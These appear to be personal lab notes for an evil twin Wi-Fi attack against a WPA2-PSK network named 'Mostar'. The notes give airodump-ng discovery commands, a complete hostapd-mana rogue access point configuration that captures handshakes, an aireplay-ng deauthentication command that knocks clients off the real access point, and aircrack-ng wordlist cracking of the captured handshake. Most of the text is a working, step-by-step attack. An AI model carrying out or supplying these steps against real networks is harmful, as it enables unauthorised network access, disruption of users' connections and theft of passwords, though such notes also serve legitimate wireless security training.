
* Explanation

  Create an AP (access point) which mimics an existing one,
  and look for devices trying to connect to the legitimate AP

  After a client connects to a network this network is saved in the PNL (preferred network list)
  A device will save the ESSID to be able to connect again without asking for a Key.

  When we create an AP with the same ESSID, if our broadcasts a stronger signal, the client to us
  instead of the legitimate one.
  
___

* Discovery of APs to grab ESSID and encryption details
@code bash
sudo airodump-ng -w discovery --output-format pcap wlan1mon
@end
 CH 12 ][ Elapsed: 0 s ][ 2020-08-14 16:23 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 ...
 FC:7A:2B:88:63:EF  -53        5        0    0   1  130   WPA2 CCMP   PSK  Mostar
 ...

 Gathered info:
  - *ESSID*       -> Mostar
  - *Encryption*  -> WPA2-PSK
  - *Cipher*      -> CCMP
  - *Mbit*        -> 130
  - *Channel*     -> 1

___

* Check for extra information
@code bash
wireshark discovery-01.cap
@end
Find beacon for the target AP: *wlan.fc.type_subtype == 0x08 && wlan.ssid == "Mostar"*

___

* Create configuration a Rogue AP with hostapd-mana
@code bash
sudo apt install hostapd-mana
  @end
Create file Mostar-mana.conf with content bellow
@code bash
# name of our interface
interface=wlan0

# ESSID of target
ssid=Mostar

# Channel of target
channel=1

# GHz to be st "g"=2.4 "a"=5
hw_mode=g

# Set ieee80211.n to true
ieee80211n=1

# Set support WPA=1 WPA2=2 WPA/WPA2=3
wpa=3

# PSK Authentication
wpa_key_mgmt=WPA-PSK

# Any password
wpa_passphrase=ANYPASSWORD

# WPA1 Encryption
wpa_pairwise=TKIP CCMP

# WPA2 Encryption
rsn_pairwise=TKIP CCMP

# Output of handshake 
mana_wpaout=/home/sombi/mostar.hccapx
@end
___

* Start hostapd-mana
@code bash
sudo hostapd-mana Mostar-mana.conf
@end
MANA: Captured a WPA/2 handshake from: fe:5c:f4:2b:d4:3e
wlan0: AP-STA-POSSIBLE-PSK-MISMATCH fe:5c:f4:2b:d4:3e

If we see we get no connections we can deauthenticated the current devices
@code bash
sudo airmon-ng start wlan1 1

sudo aireplay-ng -0 0 -e Mostar -a FC:7A:2B:88:63:EF wlan1mon
@end
___

* Cracking handshake written to hccapx file
@code bash
aircrack-ng mostar.hccapx -e Mostar -w /usr/share/john/password.list
@end
